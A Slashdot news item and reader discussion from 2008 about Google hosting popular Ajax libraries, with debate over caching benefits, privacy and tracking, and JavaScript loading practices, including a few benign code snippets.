Google To Host Ajax Libraries 285

ruphus13 writes "So, hosting and managing a ton of Ajax libraries, even when working with MooTools, Dojo, or Scriptaculous, can be quite cumbersome, especially as they get updated along with your code. In addition, several sites now use these libraries, and the end user has to download the library each time. Google will now provide hosted versions of these libraries, so sites can simply reference Google's hosted version. From the article, 'The thing is, what if multiple sites are using Prototype 1.6? Because browsers cache files according to their URL, there is no way for your browser to realize that it is downloading the same file multiple times. And thus, if you visit 30 sites that use Prototype, then your browser will download prototype.js 30 times. Today, Google announced a partial solution to this problem that seems obvious in retrospect: Google is now offering the "Google Ajax Libraries API," which allows sites to download five well-known Ajax libraries (Dojo, Prototype, Scriptaculous, Mootools, and jQuery) from Google. This will only work if many sites decide to use Google's copies of the JavaScript libraries; if only one site does so, then there will be no real speed improvement. There is, of course, something of a privacy violation here, in that Google will now be able to keep track of which users are entering various non-Google Web pages.' Will users adopt this, or is it easy enough to simply host an additional file?"
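For concreteness, opting in amounts to pointing a script tag at Google's copy of a library instead of a locally hosted one; a minimal sketch, with the library and version number chosen purely for illustration:

    <script type="text/javascript"
            src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.2/prototype.js"></script>

Every page that references the same URL shares the same cached copy, which is the whole point of the scheme.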

  • by nguy ( 1207026 ) on Wednesday May 28, 2008 @10:26AM (#23570327)
    Compared to all the other crappy media that sites tend to have these days, centralizing distribution of a bunch of JavaScript libraries makes almost no difference. I doubt it would even appreciably reduce your bandwidth costs.
    • by causality ( 777677 ) on Wednesday May 28, 2008 @10:37AM (#23570467)
      The "problem" already exists. It's "how can we collect more data about users' browsing habits?" You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintenance cost for them. They are unlikely to do this unless they believe that they can turn it into a profit, and the mechanism available to them is advertising revenue.

      This is very similar to the purpose of the already-existing google-analytics.com. I block this site in my hosts file (among others) and take other measures because I feel that if a corporation wants to take my data and profit from it, they first need to negotiate with me. Since Google is not going to do that, I refuse to contribute my data. To the folks who say "well, how else are they supposed to make money?" I say that I am not responsible for the success of someone else's business model; they are free to deny me access to their search engine if they so choose, and I would also point out that Google is not exactly struggling to turn a profit.

      The "something of a privacy violation" mentioned in the summary seems to be the specific purpose.
      • Re: (Score:3, Interesting)

        by Shakrai ( 717556 ) *

        This is very similar to the purpose of the already-existing google-analytics.com. I block this site in my hosts file (among others) and I take other measures because I feel that if a corporation wants to take my data and profit from it

        Do you actually have to block it in your hosts file in order to effectively deny them information? I have it blacklisted in NoScript -- is that sufficient? I'd always thought it was called via Javascript.

        • by pjt33 ( 739471 )
          It is, but there's no reason not to block it in the hosts file too. (You could easily have checked how it's called by viewing the source, as /. uses it. Curiously, the script is in the wrong place on this page: at the end of the head rather than the end of the body.)
        • by causality ( 777677 ) on Wednesday May 28, 2008 @11:07AM (#23570889)

          Do you actually have to block it in your hosts file in order to effectively deny them information? I have it blacklisted in NoScript -- is that sufficient? I'd always thought it was called via Javascript.


          The file is indeed Javascript and it's called "urchin.js" (nice name eh?). Personally, I use the hosts file because I don't care to even have my IP address showing up in their access logs. This isn't necessarily because I think that would be a bad thing, but it's because I don't see what benefit there would be for me and, as others have mentioned, the additional DNS query and traffic that would take place could only slow down the rendering of a given Web page.

           I also use NoScript, AdBlock, RefControl and others. RefControl is nice because the HTTP referrer is another way that sites can track your browsing; before Google Analytics it was common for many pages to include a one-pixel graphic from a common third-party host for exactly this reason. Just bear in mind that some sites (especially some shopping-cart systems) legitimately use the referrer, so you may need to add those sites to RefControl's exception list in order to shop there, since the default is to populate the referrer with the site's own homepage no matter what the actual referrer would have been.
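           (For reference, the typical Analytics include is just a couple of script blocks pasted near the bottom of the page -- roughly like the following, where the UA-XXXXXX-X account ID is a placeholder. Blocking the domain or the script element stops all of it from running.)

           <script type="text/javascript">
           var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
           document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
           </script>
           <script type="text/javascript">
           var pageTracker = _gat._getTracker("UA-XXXXXX-X");
           pageTracker._trackPageview();
           </script>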
          • by Shakrai ( 717556 ) *

            The file is indeed Javascript and it's called "urchin.js" (nice name eh?). Personally, I use the hosts file because I don't care to even have my IP address showing up in their access logs

            I guess that was my (badly phrased) question. Is blocking it in NoScript sufficient to stop Firefox from even downloading it (i.e., is it usually called with a script element, as opposed to an embedded image or some other method?), or should the truly paranoid also include it in the hosts file?

          • by Tumbarumba ( 74816 ) on Wednesday May 28, 2008 @11:47AM (#23571409) Homepage

            The file is indeed Javascript and it's called "urchin.js" (nice name eh?).
            "urchin.js" is the old name for the script. Google encourages webmasters to upgrade to the new ga.js, which has pretty much the same functionality plus some other enhancements. Both scripts feed data into the same reports. If you're interested, you can see what the script is doing by looking at http://www.google-analytics.com/ga.js [google-analytics.com]. It's pretty compact JavaScript, and I haven't gone through it to work out exactly what it's doing. Personally, I use it on the website for my wife's children's shoe shop [lillifoot.co.uk]. From my point of view, the reports I get out of Google Analytics are excellent, and really help me optimise the website for keywords and navigation. I will admit, though, that it is a little creepy that Google captures the surfing habits of people in that way.
            • Re: (Score:3, Interesting)

              by Firehed ( 942385 )
              Well that's just the dilemma. I use Google Analytics on all my sites, and sort of use the information to see what keywords are effective and most common. I don't then turn around and use that information to focus my content on those areas like any smart person would, but I don't really care if someone stumbles across my blog either (much more interesting are HeatMaps, not that I use that information in a meaningful way either).

              However, it's not just Google that's grabbing that kind of information. Anyone
          • by alta ( 1263 ) on Wednesday May 28, 2008 @12:06PM (#23571751) Homepage Journal

            I don't see what benefit there would be for me
            There are benefits; they just may not be as direct as you'd like, or as appreciated.

            We use Analytics. We use it almost exclusively to improve the experience of our customers. We don't care how many people come to our site. We care how many buy... and we have internal reports for that. What we do care about is:
            How many people are not using IE? (We found it was worth making sure all pages worked in pretty much every browser.)

            How many people are at 1280x1024 or higher?
            We dropped the notion that we needed to program for 800x600, thereby letting people use more of those big-ass screens they buy.

            Where are most of the people located?
            We now have an east coast and west coast server.

            What pages are most viewed?
            We made them easier to get to.

            Who doesn't have flash?
            It was 2.08%, but I'm still not going to let them put flash on my site.
          • by sootman ( 158191 )
            I block it at the hosts level too (thanks to these guys [mvps.org]) because whenever Safari is pinwheeling on a site, it's usually because it's waiting for some bullshit like this. Ooh, wow, you're going to slow down my browsing experience for something totally worthless like this? No thanks. I'm close to blocking Digg for the same reason--every so often those little embedded counters take *forever* to come in.
      • by Daengbo ( 523424 ) <daengbo@gmail. c o m> on Wednesday May 28, 2008 @10:54AM (#23570707) Homepage Journal
        You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintainence cost for them.

        The bandwidth cost should be small since Google uses these libraries already and the whole idea is to improve browser caching. The maintenance cost of hosting static content shouldn't be that high, either. I mean, really.

        Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.
        • by causality ( 777677 ) on Wednesday May 28, 2008 @11:14AM (#23570979)

          Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.

          Low cost != no cost. While you definitely have a point about their corporate image, I can't help but say that recognizing a company as a data-mining machine as you have accurately done, and then assuming (and that's what this is, an assumption) an altruistic motive when they take an action that has a strong data-mining component, is, well, a bit naive. I'm not saying that altruism could not be the case and that profit must be the sole explanation (that would also be an assumption); what I am saying is that given the lack of hard evidence, one of those is a lot more likely.
      • by socsoc ( 1116769 ) on Wednesday May 28, 2008 @11:12AM (#23570955)
        Google Analytics is invaluable for small business. AWStats and others cannot compete on ease of use and accuracy. By blocking the domain in your hosts file, you aren't sticking it to Google, you are hurting the Web sites that you visit. I'm employed by a small newspaper and we use Google Analytics in order to see where our readers are going and how we can improve the experience for you. Google already has this information through AdSense, or do you have that blocked too? Again you're hurting small business.

        You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
        • Re: (Score:3, Funny)

          You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
          Brilliant! He pokes you with a thumbtack and you retaliate by shooting yourself in the foot!
          • Re: (Score:2, Interesting)

            by dintech ( 998802 )
            That doesn't make any sense. What the GP is saying is that he would like to be able to exclude users who deliberately set out to circumvent his business model. Kudos to him; I hope he finds a way to do it and posts it on Slashdot when he's done.
      • by telbij ( 465356 ) on Wednesday May 28, 2008 @11:16AM (#23571003)
        Is it really necessary to be so dramatic?

        When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated. The negotiation is between Google and website owners.

        If you want to think of your HTTP requests as your data, then you'd probably best get off the Internet entirely. No one is ever going to pay you for it.

        Also:

        To the folks who say "well how else are they supposed to make money"


        Red herring. No one says that. No one even thinks about that. Frankly there are far more important privacy concerns out there than the collection of HTTP data.
        • Is it really necessary to be so dramatic?

          In what way was I dramatic? I dislike the side-effects of a business model, so I choose not to contribute to what I dislike. I wasn't claiming that any of this is the end of the world or some significant threat to society (which would constitute being dramatic); I was explaining how and why I choose not to participate.

          When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs po

          • We are not talking about the HTTP access logs of a site that I visit. We are talking about data shared with third parties for marketing purposes. This data does not materialize out of thin air; it requires my participation. So long as this is the case, I am well within my rights to decline to participate. To the person who claims I used a red herring: please do explain what's wrong with that.

            The red herring is whether you're actually preventing any use of data. You're concerned that GA shares the data with Google as well as the site owner. But once your visit is logged at the server, the site owner can share that data with whoever the heck they feel like. The data in HTTP server logs is widely understood to be the property of the site owner, who is free to do whatever they want with it.

            The only difference is that it would not be obvious to you when it happens. If you think otherwise yo

        • Re: (Score:3, Insightful)

          by robo_mojo ( 997193 )

          When you visit a website, the site owner is well within their rights to record that visit.

          Yup. I have no way to stop them, after all.

          The negotiation is between Google and website owners.

          Nope. If the website owner wants to transmit information to Google, he can do so by having his server contact Google, or by dumping his logs to Google.

          Instead, if the website owner sends code to my browser to give information to Google, I am within my rights to refuse to do so.

          Alternatively, the website owner in qu

      • by dalmaer ( 725759 ) on Wednesday May 28, 2008 @11:32AM (#23571195)
        I understand that people like to jump onto privacy, but there are a couple of things to think about here:

        - We have a privacy policy that you can check out.
        - There isn't much information we can actually get here, because:
          a) The goal is to have JavaScript files cached regularly, so as you go to other sites the browser will read the library from the cache and never have to hit Google!
          b) If we can get browsers to work with the system, they can likewise do more optimistic caching, which again means not having to go to Google.
          c) The referrer data is just from the page itself that loaded the JavaScript. If you think about it, if you included prototype.js anyway then we could get that information via the spider... but it isn't of interest.

        We are a for-profit company, but we also want to make the Web a better, faster place, as that helps our business right there. The more people on the Web, the more people doing searches, and thus the better we can monetize. Hopefully as we continue to roll out services, we will continue to prove ourselves and keep the trust levels high with you, the developers.

        Cheers,
        Dion
        Google Developer Programs
        Ajaxian.com
        • c) The referrer data is just from the page itself that loaded the JavaScript. If you think about it, if you included prototype.js anyway then we could get that information via the spider... but it isn't of interest.
          But now you also have the traffic-pattern data for any of those sites that weren't already using Google Analytics; that's definitely valuable.
          • by JavaRob ( 28971 ) on Wednesday May 28, 2008 @01:35PM (#23573171) Homepage Journal

            but now you also have the traffic pattern data for any of those sites that didn't use google analytics already, that's definitely valuable.
            No, they don't. Look again at how caching works. The first time a given browser hits a site that uses Prototype, for example, it'll pull the JS from Google (so Google sees that single site). The browser then hits 20 other sites that also use Prototype... and Google has no clue, because the JS is already cached.

            In fact, the cache headers specify that the JS libs don't expire for A YEAR, so Google will only see the first site you visit that uses a given library version in an entire year.

            Is this information really that valuable?

            Mind you, this assumes you're hard-coding the google-hosted URLs to the JS libs, instead of using http://www.google.com/jsapi [google.com] -- but that's a perfectly valid and supported approach.

            If you use their tools to wildcard the library version, etc. etc. then they get a ping each time that JSAPI script is loaded (again, no huge amount of info for them, but still you can decide whether you want the extra functionality or not).
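            To make the distinction concrete, the two styles look roughly like this (version numbers are only illustrative):

            <!-- hard-coded static URL: served with far-future cache headers, so Google only
                 sees a request when the file isn't already in the browser's cache -->
            <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>

            <!-- loader style: gives you version wildcarding, at the cost of fetching the
                 jsapi script whenever it isn't cached -->
            <script src="http://www.google.com/jsapi"></script>
            <script type="text/javascript">
              google.load("jquery", "1.2.6");
            </script>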
  • The whole idea of having a single URI for these very common .js files is that they can be cached, and not just on your local computer. Any caching proxy that can follow the HTTP/1.1 cache protocol would serve these files out of a local cache.

    Moreover, if this idea catches on, Web browsers will begin shipping with these well-known URIs preinstalled, perhaps even with optimized versions of the scripts that cut out all the IE6 cruft. What is really needed to make this work is a high bandwidth, high availabil
    • by djw ( 3187 )

      The idea, as far as I can tell, is to improve browser caching, not just distribution.

      If a lot of sites that use prototype.js all refer to it by the same URL, chances are greater that a given client will already have cached the file before it hits your site. Therefore, you don't have to serve as much data and your users don't have to keep dozens of copies of the same file in their caches, and sites load marginally faster for everyone on the first hit only.

      Plus Google gets even more tracking data with

    • That very much depends on whose problem you're talking about.

      If you're a web site worried about javascript library hosting, caching and such, this will help, a bit. Mostly to banish an annoyance.

      If, on the other hand, you're a famous search engine who'd love to know more about who uses what javascripting libraries on which sites ... well, this sort of scheme is just your ticket.
  • If you want to improve the speed of downloading, how about removing the 70% of the code that just encodes/decodes XML and using simple, efficient delimiters instead? I was a fan of Xajax, but I had to re-write it from scratch... XML is too verbose when you control both endpoints.

    It is not a problem to host an additional file, and this only gives Google more information than they need... absolutely no good reason for this.

    • Well, from my experience making AJAX libraries, the stuff to encode to XML is pretty minimal. It's pretty easy and compact to write code which, when you call a function, sends an XML snippet to the server to run a specific method of a specific class with a few parameters. The real lengthy part is getting the browser to do something with the XML you send back.
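      A rough sketch of the sort of call I mean -- the endpoint, the XML vocabulary, and handleResponse() are made up for illustration, and older IE would need the ActiveX fallback for XMLHttpRequest:

      var xhr = new XMLHttpRequest();
      xhr.open('POST', '/ajax/dispatch.php', true);
      xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && xhr.status == 200) {
          handleResponse(xhr.responseXML); // the genuinely lengthy part: doing something with the XML
        }
      };
      xhr.setRequestHeader('Content-Type', 'text/xml');
      xhr.send('<call class="Cart" method="addItem"><param>42</param></call>');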
    • Re: (Score:3, Informative)

      by AKAImBatman ( 238306 )

      how about removing 70% of the code which just encodes/decodes from XML

      Done [json.org]. What's next on your list?

      (For those of you unfamiliar with JSON, it's basically a textual representation of JavaScript. e.g.

      {
      name: "Jenny",
      phone: "867-5309"
      }

      If you trust the server, you can read that with a simple "var obj = eval('('+json+')');". If you don't trust the server, it's still easy to parse with very little code.)
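      A minimal sketch of the "don't trust the server" path, assuming a JSON parser is available (native JSON.parse in newer browsers, or Crockford's json2.js):

      var json = '{ "name": "Jenny", "phone": "867-5309" }';
      var obj;
      if (window.JSON && JSON.parse) {
        obj = JSON.parse(json);       // accepts plain data only
      } else {
        obj = eval('(' + json + ')'); // fallback -- only acceptable if you trust the server
      }
      alert(obj.phone);               // "867-5309"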

      • And if you still want to use jQuery for other JavaScript interface joy, it can handle JSON natively [jquery.com]. (Other frameworks probably do too, I just happen to be a fan of jQuery.)

      • This was a dumb feature in Javascript. In LISP, there's the "reader", which takes in a string and generates an S-expression, and there's "eval", which runs an S-expression through the interpreter. The "reader" is safe to run on hostile data, but "eval" is not. In Javascript, "eval" takes in a string and runs it as code. Not safe on hostile data.

        JSON is a huge security hole if read with "eval". Better libraries try to wrap "eval" with protective code that looks for "bad stuff" in the input. Some such

  • Well doh (Score:4, Insightful)

    by Roadmaster ( 96317 ) on Wednesday May 28, 2008 @10:28AM (#23570351) Homepage Journal

    Will users adopt this, or is it easy enough to simply host an additional file?
    Well duh, it's dead easy for me to just host another file, so easy in fact that web frameworks usually do it for you by default, but that's missing the point: the point is that for the end-user it would be better, faster and more efficient if I went to the trouble of using google's hosted version, instead of using my local copy. That, indeed, would be more work for me, but it benefits the end user.
    • but it benefits the end user.
      And google too ;)
    • by Nursie ( 632944 )
      How?

      A bit of code (unless I'm missing something) is going to be smaller than your average image. What's the gain?
      Other than for google of course.
  • by CastrTroy ( 595695 ) on Wednesday May 28, 2008 @10:31AM (#23570391)
    This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of script just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple of pages wouldn't have to download the entire library. Have each function in its own file, and then when an AJAX call is made, make it smart enough to figure out which functions need to be downloaded to run the resulting JavaScript. The problem with Google hosting everything is that everybody has to use the versions that Google has posted, and that you can't do any custom modifications to the components. I think that what Google is doing will help, but the solution is far from optimal.
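    A rough sketch of what that on-demand loading could look like -- loadScript() and initDragAndDrop() are made-up names, and IE6/7 would need an onreadystatechange check instead of onload:

    function loadScript(url, callback) {
      var s = document.createElement('script');
      s.type = 'text/javascript';
      s.src = url;
      s.onload = callback; // fires once the extra code has been fetched and parsed
      document.getElementsByTagName('head')[0].appendChild(s);
    }

    loadScript('/js/drag-drop.js', function () {
      initDragAndDrop(); // defined in the file that was just pulled in
    });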
    • by dmomo ( 256005 )
      > The problem with Google hosting everything, is that everybody has to use the versions that Google has posted, and that you can't do any custom modifications to the components. I think that what Google is doing would help. But the solution is far from optimal.

      That isn't too much of a problem. You can include the Google version first and then override any function or object by simply redeclaring it.
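      For example (the hosted URL, version, and the tweak itself are only illustrative):

      <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
      <script type="text/javascript">
        // a later declaration simply shadows the hosted one
        var originalTrim = jQuery.trim;
        jQuery.trim = function (text) {
          return originalTrim(text).replace(/\s+/g, ' '); // also collapse internal whitespace
        };
      </script>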
    • by Bobb Sledd ( 307434 ) on Wednesday May 28, 2008 @10:46AM (#23570603) Homepage
      Yikes...

      Maybe it is possible to get TOO modular. Several problems with that:

      1. With many little files come many little requests. If the web server is not properly set up, the overhead these individual requests cause really slows down the transmission of the page. Usually, it's faster to have everything in one big file than to have the same number of kilobytes spread across many smaller files.

      2. From a development point of view, I use several JS bits that require this or that library. I don't know why, or what functions they need. And I really don't care; I have my own stuff to worry about. I don't want to go digging through someone else's code (that already works) to figure out which functions it doesn't need.

      3. If I do custom work where file size is a major factor or if I only use one function from the library, I guess then I'll just modify as I see fit and host on my own site.

      I think what Google is doing is great, but I can't really use it for my sites (they're all served over HTTPS). So unless I want that mixed-content warning to come up, I won't be using it.
    • by ClayJar ( 126217 ) on Wednesday May 28, 2008 @10:52AM (#23570677) Homepage

      Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple pages wouldn't have to download the entire library. Have each function in it's own file, and then when an AJAX call is done, make it smart enough to figure out which functions need to be downloaded to run the resulting Javascript.
      Actually, the trend is in the opposite direction. By including everything in one file, you can greatly reduce the number of HTTP transactions. Eliminating the significant overhead there can improve "speed" tremendously.

      Additionally, if you're using compression, it is likely that one large file will compress more effectively than a collection of smaller files. (You *are* using compression, aren't you?)
      • But isn't the whole point of AJAX to reduce server load by having users do lots of little requests instead of a few large requests? While one large file would compress better than many small files, would one large file compress better than 1/10 of the data actually being sent out because the user didn't need the other 9/10 of the data? You could also optimize the fetching of code by sending a single request to request all the Javascript for a specific action in just one request. Which would contain a big
    • It's a good idea, but you're trading a little bandwidth for a lot of extra requests (and latency). And besides: a few hundred kilobytes isn't a big deal these days if users only have to download it once, which is what Google is doing. Custom per-site implementations defeat that.
    • by vitaflo ( 20507 )
      Mootools sort of does this, but on the developer end. When you download Mootools you get to choose which components you want as part of your JS libs. Just need AJAX and not the fancy effects, CSS selectors, etc? Then you can just include the AJAX libs into Mootools and forget the rest. It's not load on demand, but at least it's better than having to download a 130k file when you're only using 10k of it.
    • Re: (Score:3, Informative)

      by lemnar ( 642664 )
      AJAX systems are modular - at least some of them are, somewhat. Scriptaculous, for example, can be loaded with only certain functions.

      "With Google hosting everything," you get to use exactly the version you want - google.load('jquery', '1.2.3') or google.load('jquery', '1.2'), which will get you the highest 1.2.x version available - currently 1.2.6. Furthermore, you can still load your own custom code or modifications after the fact.

      For those concerned about privacy: yes they keep stats - they e
    • This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of scrip just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed?

      It exists. It's called MooTools. The JavaScript programmer can decide which functions/objects/classes they need on any individual web page and download a packed version of the library that suits only their particular needs.

      That way, someone vis

  • nothing new here (Score:5, Informative)

    by Yurka ( 468420 ) on Wednesday May 28, 2008 @10:32AM (#23570411) Homepage
    The DTD files for the basic XML schemas have been hosted centrally at Netscape and w3.org since forever. No one cares or, indeed, notices (until they go down [slashdot.org], that is).
  • Yabbut (Score:3, Interesting)

    by FlyByPC ( 841016 ) on Wednesday May 28, 2008 @10:35AM (#23570441) Homepage
    Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

    I like Google too -- and this is nice of them -- but I like the idea of a website being as self-sufficient as possible (not relying on other servers, which introduce extra single-points-of-failure into the process.)

    At the risk of sounding like an old curmudgeon, whatever happened to good ol' HTML?
    • by SuperBanana ( 662181 ) on Wednesday May 28, 2008 @10:45AM (#23570585)

      Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

      Think broader. What happens when:

      • Google decides to wrap more than just the promised functionality into it? For example, maybe "display a button" turns into "display a button and report usage stats"?
      • Google gets hacked and malicious Javascript is included?

      But, yes- you're right. This is a scary new dependency. For a company full of PhD geniuses supposedly Doing No Evil, nobody at Google seems to understand how dangerous they are to the health of the web. In fact, I'd suggest they do, and they don't care- because they seem hell-bent on making everything on the web touch/use/rely upon Google in some way. This is no exception.

      A lot of folks don't even realize how Google is slowly getting open-source projects to rely on them, too (with Google Summer of Code).

      • Re: (Score:3, Insightful)

        Oh no! If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

        I'm *so* scared.

        Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

        And if Google is hacked, we're ALL screwed a hundred different ways. The average web developer *using* these libraries is more likely to have a vulnerable server than Google.
      • by mckinnsb ( 984522 ) on Wednesday May 28, 2008 @12:18PM (#23571957)
        Being a Javascript programmer myself, I was wondering which post to reply to. I guess this one suits. There are a lot of issues I'd like to tackle, here.

        Yeah, but what if Google decides that nobody is using these -- or they can't legally host them for whatever reason -- or they just decide that they don't want to do this anymore?

        Then you go back to including a script tag in the header of your HTML document. All of these frameworks are free. They will likely remain free even though some are sponsored (MooTools). The speed improvement exists, but is moderate-to-minimal, since a packed full-inclusion build of MooTools runs you about 32 KB. That's 32 KB the user won't need to download again and again, but it's still just 32 KB.

        Think broader. What happens when: * Google decides to wrap more than just the promised functionality into it? For example, maybe "display a button" turns into "display a button and report usage stats"?

        Even if the code is compressed and obfuscated, this "wrapped functionality" would become *glaringly* obvious to any JavaScript programmer using Firebug. The news would most likely spread like wildfire, especially on /. The only thing they could track without it being noticeable is which IP addresses are requesting the mootools.js (for example) file. They could measure its popularity, but not *necessarily* what sites those users are visiting. Granted, I haven't looked at the API yet, but if it's just a .js file hosted on a Google server, there isn't really much they can monitor that they don't already. Analytics provides them with *tons* more information. To be honest, this just seems like a professional courtesy.

        There is a key point here I hope was visible - JavaScript is totally load-on-delivery, executed client-side. They can't really sneak much past you, and any effort to do so would still be visible in some way (you would see the network traffic).

        * Google gets hacked and malicious Javascript is included?

        Interesting, but I haven't seen Google hacked yet - not saying it can't happen, but I've not seen it. There is more of a chance of someone intercepting the expected .js file and passing along a different one - however, keep in mind that if you are doing *anything* that requires any level of security whatsoever in JS, well, you have other, deeper fundamental problems.

        But, yes- you're right. This is a scary new dependency. For a company full of PhD geniuses supposedly Doing No Evil, nobody at Google seems to understand how dangerous they are to the health of the web. In fact, I'd suggest they do, and they don't care- because they seem hell-bent on making everything on the web touch/use/rely upon Google in some way. This is no exception. A lot of folks don't even realize how Google is slowly weaning open-source projects into relying on them, too (with Google Summer of Code.)

        It is a dependency, but it's not that scary. Open source projects have always been, for better or worse, more or less reliant on outside momentum to keep them going. Joomla has conferences (that you have to pay to see), MySQL is backed by Sun, Ubuntu has pay-for-support. The fact that Google is willing to pay for kids to work on open source projects of their choosing (and granted, from Google's selection) is not necessarily a form of control above and beyond the influence of capital. If I had millions of dollars, I would probably donate to open source projects myself - and they may be ones of my choosing - but I couldn't consider myself to be controlling them as much as helping them grow.

        This is really nothing more than a professional courtesy offered by Google. They are right - it's dumb for everyone to download the same files over and over again.

        Furthermore, someone made a post earlier talking about JS programmers needing to learn how to use "modularity". We

      • Re: (Score:3, Insightful)

        by caerwyn ( 38056 )
        I'll take the benefits of Google supporting open source over "GSoC is evil" paranoia.

        If Google suddenly decides to stop hosting these, or touches them in some fashion, it's going to get discovered and fixed in well under 24 hours. Google hosting a file like this means that there are going to be a *lot* of eyes on the file.

        Google is, as it currently stands, far from "dangerous to the health of the web". Outside of using their webmail fairly heavily, I could avoid using google quite easily- as could any other
  • I won't adopt (Score:5, Insightful)

    by corporal_clegg ( 547755 ) on Wednesday May 28, 2008 @10:37AM (#23570461) Homepage
    As a developer, I consider the privacy of my users to be of paramount importance. I have grown increasingly concerned with Google's apparently incessant need to pry into my searches and my browsing habits. Where once I was a major Google supporter, I have trimmed my use of their services back from email and toolbars to simple searches, and now I won't use their service at all if I am searching for anything that may be misconstrued at some point by guys in dark suits with plastic ID badges. The last thing I am going to do as a developer is force my users into a situation where they can feed the Google Logging Engine.
  • Comment removed (Score:3, Insightful)

    by account_deleted ( 4530225 ) on Wednesday May 28, 2008 @10:43AM (#23570557)
    Comment removed based on user account deletion
    • Re: (Score:3, Informative)

      Because the hundred other pages the visitor went to that session are also demanding that their own copy of the library be downloaded. It's not your bandwidth this saves (or only trivially so) - it's the end user's download, and parse, of the same code for each of the dozen sites he visits that use the same library. The libraries Google has initially chosen are extremely popular - i.e. there are good odds that you have a dozen copies in your browser cache right now - each download of which made your browsing exp
  • by Gopal.V ( 532678 ) on Wednesday May 28, 2008 @10:43AM (#23570559) Homepage Journal

    I didn't see no slashdot article when yahoo put up hosted YUI packages [yahoo.com] served off their CDN.

    I guess it's because google is hosting non-google libraries?

  • by samuel4242 ( 630369 ) on Wednesday May 28, 2008 @10:45AM (#23570581)
    With their own YUI libraries. See here [yahoo.com] Anyone have any experience with this? I'm a bit wary of trusting Yahoo, although I guess it's easy enough to swap it out.
  • by Anonymous Coward on Wednesday May 28, 2008 @10:55AM (#23570723)
    A far better solution would be to add an attribute to the script tag which the browser could check to see whether it already has the file. For security reasons you would need to always define it in order to use it, so if you don't define it, there will never be a mix-up.

    E.g.:

    <script type="text/javascript" src="prototype.js" origin="http://www.prototype.com/version/1.6/" md5="..............."></script>

    When another site wants to use the same lib, it can use the same origin, and the browser will not download it again from the new site. It's crucial to use the md5 (or another hash), which the browser must calculate the first time it downloads the file. Otherwise it would be easy to create a bogus file and get it run on another site.

    Of course this approach is only as secure as the hash.
  • The web really needs some sort of link to a SHA-256 hash or something. If that kind of link were allowed ubiquitously it could solve the Slashdot effect and also make caching work really well for pictures, Ajax libraries and a whole number of other things that don't change that often.

    • I wish I could go back and edit my post...

      It would also solve stupid things like Netscape ceasing to host the DTDs for RSS.

  • I know it is not obvious, but sites that are sensitive to bandwidth issues may find this a cost saving measure.
    Google, of course, gets even more information about everyone.

    Win-win, except for us privacy people. I guess we have to trust "do no evil," huh?
  • Yeah, so it downloads some Ajax library twice, or even ten times, or a hundred. So what? The ads on your typical webpage are ten times as much in size and bandwidth.

    Thanks, but I prefer that my site works even if some other site I have nothing to do with is unreachable today. Granted, Google being unreachable is unlikely, but think about offline copies, internal applications, and all the other perfectly normal things that this approach suddenly turns into special cases.
    • But that's the point - those ads are already mostly centrally hosted - i.e they were already using a few common sources - now the code libraries have a common source.
  • Umm, no (Score:4, Interesting)

    by holophrastic ( 221104 ) on Wednesday May 28, 2008 @11:24AM (#23571103)
    First, I block all google-related content, period. This type of thing would render many sites non-operational.

    Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense. Even as a locally cached file, on a broadband connection, downloading the extra 10K is typically faster than opening and reading the locally cached file!

    But still, hosting a part of your corporate web-site with google simply breaches most of your confidentiality and non-disclosure agreements that you have with your clients and suppliers. It's that simple. Find the line that reads "shall not in any way disclose Confidential Information to any third party at any time, including consultants and contractors, copy and/or merge the Confidential Information/business relationship with any other technology, software or materials, except contractors with a specific need to know . . ."

    Simply put, if your Confidential client conversations go over gmail, you're in breach. If google tracks/monitors/sells/organizes/eases your business with your clients or suppliers, you're in breach -- i.e. it's illegal, and your own clients/suppliers can easily sue you for giving google their trade secrets.

    Obviously it's easier to out-source everything and do nothing. But there's a reason that Google and other such companies offer these services for free -- it's free as in beer, at the definite cost of every other kind of free; and it's often illegal for businesses.
    • by _xeno_ ( 155264 )

      Second, I've always had this complaint with the whole external javascript files. When you're already downloading a 50K html page, another 10K of javascript code in the same file inline downloads at full-speed. The external file requires yet another hit to the server, and everything involved therein. It almost never makes any sense. Even as a locally cached file, on a broadband connection, downloading the extra 10K is typically faster than opening and reading the locally cached file!

